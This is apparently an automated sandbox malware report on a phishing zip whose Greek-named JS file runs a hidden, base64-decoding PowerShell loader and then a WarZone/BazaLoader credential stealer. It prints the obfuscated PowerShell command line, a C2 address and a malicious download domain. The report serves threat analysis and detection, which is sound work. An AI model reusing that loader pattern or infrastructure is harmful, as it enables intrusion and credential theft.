File name:

15052025_1700_13052025__7915322331.zip

Full analysis: https://app.any.run/tasks/bde12d7d-7aed-4fe5-9da4-f2fd243a9731
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 15, 2025, 17:11:13
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-scr
susp-powershell
loader
reverseloader
payload
stealer
warzone
bazaloader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

A9850D7E26BCBBB62025C283C111768C

SHA1:

E6A585141082FC76B215A2FF6FCBF2EE8CA79B5A

SHA256:

F32C577CFD35F399BF0BC95F1011AEB4155F11314FC7D41C31D20ED616815A6D

SSDEEP:

192:Bk5P780PdE7g9hmYqucRxgSAczNfZwmhUwOxYc93fCKDF:iDK7g9hmfuciujwmLiF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 4024)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4688)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 4688)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 4688)
    • Actions look like stealing of personal data

      • RegSvcs.exe (PID: 5728)
    • Steals credentials from Web Browsers

      • RegSvcs.exe (PID: 5728)
    • BAZALOADER has been detected (YARA)

      • RegSvcs.exe (PID: 5728)
    • WARZONE has been detected (YARA)

      • RegSvcs.exe (PID: 5728)
  • SUSPICIOUS

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 3884)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 3884)
    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 3884)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 3884)
    • Executes script without checking the security policy

      • powershell.exe (PID: 4688)
    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 3884)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4688)
    • Connects to unusual port

      • RegSvcs.exe (PID: 5728)
    • Executable content was dropped or overwritten

      • RegSvcs.exe (PID: 5728)
    • The process drops C-runtime libraries

      • RegSvcs.exe (PID: 5728)
    • Process drops legitimate windows executable

      • RegSvcs.exe (PID: 5728)
    • The process drops Mozilla's DLL files

      • RegSvcs.exe (PID: 5728)
  • INFO

    • Manual execution by a user

      • wscript.exe (PID: 3884)
    • Disables trace logs

      • powershell.exe (PID: 4688)
    • Checks proxy server information

      • powershell.exe (PID: 4688)
      • slui.exe (PID: 976)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4688)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 4688)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 4688)
    • Reads the computer name

      • RegSvcs.exe (PID: 5728)
    • Reads the machine GUID from the registry

      • RegSvcs.exe (PID: 5728)
    • Checks supported languages

      • RegSvcs.exe (PID: 5728)
    • Creates files or folders in the user directory

      • RegSvcs.exe (PID: 5728)
    • Creates files in a temporary directory

      • RegSvcs.exe (PID: 5728)
    • The sample was compiled with English language support

      • RegSvcs.exe (PID: 5728)
    • Reads the software policy settings

      • slui.exe (PID: 976)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report

WarZone

(PID) Process: (5728) RegSvcs.exe
C2 (1): 196.251.115.121:4422
BuildID: TFHS94M973
Options
Install Flag: False
Startup Flag: False
Reverse Proxy local port: 5000
Offline log: False
Persistence: False
UAC bypass: False
Defender bypass: False
Use ADS: False

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0800
ZipCompression: Deflated
ZipModifyDate: 2025:05:12 08:01:50
ZipCRC: 0xaabf1cbd
ZipCompressedSize: 11400
ZipUncompressedSize: 1574055
ZipFileName: Ειδοποίηση πληρωμής_79153 22331.JS
All screenshots are available in the full report
Total processes: 129
Monitored processes: 6
Malicious processes: 3
Suspicious processes: 0

Behavior graph

Processes in the graph: winrar.exe (no specs), wscript.exe (no specs), powershell.exe, conhost.exe (no specs), regsvcs.exe (#WARZONE), slui.exe

Process information

PID: 976
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 3884
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Ειδοποίηση πληρωμής_79153 22331.JS"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3896
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4024
CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\15052025_1700_13052025__7915322331.zip
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 4688
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fructificative = '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' -replace '','';$deedless = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($fructificative));Invoke-Expression $deedless;"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5728
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Services Installation Utility
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\user32.dll
Total events: 10 525
Read events: 10 514
Write events: 11
Delete events: 0

Modification events

(PID) Process: (4024) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 3
Value: C:\Users\admin\Desktop\preferences.zip

(PID) Process: (4024) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\chromium_ext.zip

(PID) Process: (4024) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip

(PID) Process: (4024) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\Desktop\15052025_1700_13052025__7915322331.zip

(PID) Process: (4024) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (4024) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (4024) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

(PID) Process: (4024) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

(PID) Process: (3884) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation: write
Name: JScriptSetScriptStateStarted
Value: 2DDE100000000000

(PID) Process: (5728) RegSvcs.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Operation: write
Name: MaxConnectionsPer1_0Server
Value: 10
Executable files: 6
Suspicious files: 6
Text files: 2
Unknown types: 0

Dropped files

PID: 4688 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ejvnx4jv.vz5.psm1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 5728 | Process: RegSvcs.exe | Type: executable
Filename: C:\Users\admin\AppData\Local\Temp\vcruntime140.dll
MD5: 7587BF9CB4147022CD5681B015183046
SHA256: C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D

PID: 5728 | Process: RegSvcs.exe | Type: binary
Filename: C:\Users\admin\AppData\Roaming\.sbapeh.tmp
MD5: A45465CDCDC6CB30C8906F3DA4EC114C
SHA256: 4412319EF944EBCCA9581CBACB1D4E1DC614C348D1DFC5D2FAAAAD863D300209

PID: 5728 | Process: RegSvcs.exe | Type: executable
Filename: C:\Users\admin\AppData\Local\Temp\softokn3.dll
MD5: 471C983513694AC3002590345F2BE0DA
SHA256: BB3FF746471116C6AD0339FA0522AA2A44A787E33A29C7B27649A054ECD4D00F

PID: 5728 | Process: RegSvcs.exe | Type: binary
Filename: C:\Users\admin\AppData\Roaming\igcnrvf.tmp
MD5: 29A644B1F0D96166A05602FE27B3F4AD
SHA256: BF96902FEB97E990A471492F78EE8386BCF430D66BDAEFDEAFBF912C8CF7CE46

PID: 5728 | Process: RegSvcs.exe | Type: binary
Filename: C:\Users\admin\AppData\Roaming\sxxyk.A.tmp
MD5: 414B7F9E82EE13FB08D39D366B2FBEC8
SHA256: 6F9AD831D38FF839C0EE3593CC5452D7BE31D9725EE81D3E7AD20E4D91736971

PID: 5728 | Process: RegSvcs.exe | Type: executable
Filename: C:\Users\admin\AppData\Local\Temp\msvcp140.dll
MD5: 109F0F02FD37C84BFC7508D4227D7ED5
SHA256: 334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4

PID: 5728 | Process: RegSvcs.exe | Type: binary
Filename: C:\Users\admin\AppData\Roaming\ooDqjds.tmp
MD5: 1051384B8864AC718AE413E9B1D309A5
SHA256: 3FC536607727B6030F7B4714D6E03B4CA040B2EBDBE81B74538F345432207360

PID: 5728 | Process: RegSvcs.exe | Type: executable
Filename: C:\Users\admin\AppData\Local\Temp\nss3.dll
MD5: D7858E8449004E21B01D468E9FD04B82
SHA256: 78758BF7F3B3B5E3477E38354ACD32D787BC1286C8BD9B873471B9C195E638DB

PID: 5728 | Process: RegSvcs.exe | Type: executable
Filename: C:\Users\admin\AppData\Local\Temp\freebl3.dll
MD5: EF12AB9D0B231B8F898067B2114B1BC0
SHA256: 2B00FC4F541AC10C94E3556FF28E30A801811C36422546A546A445ACA3F410F7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 9
TCP/UDP connections: 54
DNS requests: 19
Threats: 7

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
(the Type and Size columns carry no values in this export)
2104 | svchost.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
2104 | svchost.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
6964 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | whitelisted
6964 | SIHClient.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | whitelisted
6964 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
6964 | SIHClient.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | whitelisted
6964 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | unknown | whitelisted
6964 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | unknown | whitelisted
6964 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:138 | (none) | (none) | (none) | whitelisted
2104 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
(not listed) | (not listed) | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
(not listed) | (not listed) | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
4 | System | 192.168.100.255:137 | (none) | (none) | (none) | whitelisted
2104 | svchost.exe | 2.19.11.120:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted
2104 | svchost.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted
6544 | svchost.exe | 40.126.31.71:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
4688 | powershell.exe | 95.173.189.182:443 | onfiltre.com.tr | Netinternet Bilisim Teknolojileri AS | TR | suspicious

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.78
whitelisted
client.wns.windows.com
  • 172.211.123.250
  • 172.211.123.248
whitelisted
crl.microsoft.com
  • 2.19.11.120
  • 2.19.11.105
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 95.101.149.131
whitelisted
login.live.com
  • 40.126.31.71
  • 20.190.159.129
  • 20.190.159.131
  • 40.126.31.130
  • 40.126.31.128
  • 20.190.159.4
  • 40.126.31.129
  • 40.126.31.73
whitelisted
onfiltre.com.tr
  • 95.173.189.182
unknown
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
whitelisted
channelchief.varindia.com
  • 103.249.97.230
unknown
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

PID | Process | Class | Message
(not listed) | (not listed) | Misc activity | INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
(not listed) | (not listed) | Exploit Kit Activity Detected | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound
(not listed) | (not listed) | Exploit Kit Activity Detected | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1
(not listed) | (not listed) | Exploit Kit Activity Detected | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2
(not listed) | (not listed) | Potentially Bad Traffic | PAYLOAD [ANY.RUN] Reverse Base64 Encoded EXE Inbound
(not listed) | (not listed) | A Network Trojan was detected | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound
5728 | RegSvcs.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 41